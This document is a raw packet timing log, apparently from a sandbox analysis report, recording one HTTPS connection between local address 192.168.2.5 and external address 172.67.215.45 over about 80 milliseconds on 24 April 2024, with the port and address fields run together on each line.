                                                                                                                              Apr 24, 2024 06:48:19.576417923 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.576562881 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.576577902 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.576649904 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.577955961 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.577980995 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.578030109 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.578044891 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.578064919 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.578087091 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.579068899 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.579087019 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.579159021 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.579170942 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.579216003 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.581091881 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.581113100 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.581206083 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.581221104 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.581300020 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.582258940 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.582279921 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.582401991 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.582402945 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.582420111 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.582578897 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.583951950 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.583966017 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.584122896 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.584142923 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.584228992 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.585737944 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.585761070 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.585877895 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.585894108 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.586157084 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.586651087 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.586673021 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.586760998 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.586775064 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.586833954 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.588383913 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.588396072 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.588531971 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.588547945 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.588718891 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.589936972 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.589955091 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.590135098 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.590145111 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.590245008 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.591376066 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.591392994 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.591470957 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.591489077 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.591599941 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.592581987 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.592598915 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.592720985 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.592736006 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.592899084 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.594474077 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.594491959 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.594552040 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.594569921 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.594584942 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.594635963 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.595246077 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.595267057 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.595328093 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.595338106 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.595455885 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.597611904 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.597631931 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.597708941 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.597727060 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.597817898 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.599484921 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.599503994 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.599633932 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.599633932 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.599653006 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.599777937 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.601244926 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.601260900 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.601392031 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.601408958 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.601458073 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.602410078 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.602427006 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.602565050 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.602590084 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.602648020 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.603116035 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.603137016 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.603193998 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.603204012 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.603298903 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.603895903 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.603913069 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.603977919 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.603986979 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.604118109 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.604952097 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.604965925 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.605261087 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.605273962 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.605346918 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.606508970 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.606523991 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.606590986 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.606606007 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.606729984 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.607621908 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.607637882 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.607785940 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.607798100 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.607856989 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.609272957 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.609288931 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.609350920 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.609360933 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.609417915 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.610480070 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.610502005 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.610578060 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.610589027 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.610671997 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.612499952 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.612524986 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.612610102 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.612624884 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.612673998 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.613698959 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.613718987 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.613841057 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.613853931 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.613907099 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.615042925 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.615057945 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.615148067 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.615160942 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.615206003 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.616863012 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.616889954 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.616928101 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.616939068 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.617005110 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.617005110 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.617995977 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.618012905 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.618099928 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.618109941 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.618185043 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.619314909 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.619335890 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.619407892 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.619407892 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.619424105 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.619474888 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.620244026 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.620286942 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.620399952 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.620409966 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.620460033 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.621439934 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.621459007 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.621515036 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.621524096 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.621565104 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.622226954 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.622245073 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.622297049 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.622307062 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.622364998 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.623179913 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.623198986 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.623327971 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.623336077 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.623393059 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.624331951 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.624351978 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.624525070 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.624541044 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.624665022 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.626209974 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.626226902 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.626302958 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.626312017 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.626384020 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.627175093 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.627194881 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.627252102 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.627259970 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.627315998 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.628379107 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.628405094 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.628566980 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.628576994 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.628670931 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.629970074 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.629987955 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.630038977 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.630049944 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.630085945 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.630924940 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.630949020 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.630999088 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.631006956 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.631036043 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.631056070 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.632531881 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.632558107 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.632656097 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.632657051 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.632673979 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.632721901 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.633754015 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.633773088 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.633881092 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.633893967 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.633970976 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.634650946 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.634666920 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.634748936 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.634777069 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.634902954 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.635821104 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.635843992 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.635932922 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.635943890 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.636065006 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.637855053 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.637881041 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.637933016 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.637945890 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.637963057 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.637991905 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.639858007 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.639878988 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.639947891 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.639961004 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.640022039 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.640022039 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.642151117 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.642177105 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.642288923 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.642288923 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.642302990 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.642416000 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.643691063 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.643716097 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.643758059 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.643767118 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.643840075 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.643840075 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.645067930 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.645083904 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.645143986 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.645158052 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.645260096 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.646378040 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.646398067 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.646471024 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.646486044 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.646617889 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.647450924 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.647470951 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.647526979 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.647537947 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.647593975 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.648912907 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.648933887 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.649038076 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.649049997 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.649085999 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.649096012 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.650279045 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.650300980 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.650408983 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.650408983 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.650419950 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.650485992 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.651773930 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.651794910 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.651901007 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.651912928 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.651987076 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.653358936 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.653378010 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.653501987 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.653512001 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.653561115 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.654228926 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.654247999 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.654378891 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.654386997 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.654463053 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.655005932 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.655023098 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.655090094 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.655100107 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.655193090 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.656315088 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.656332970 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.656415939 CEST49706443192.168.2.5172.67.215.45
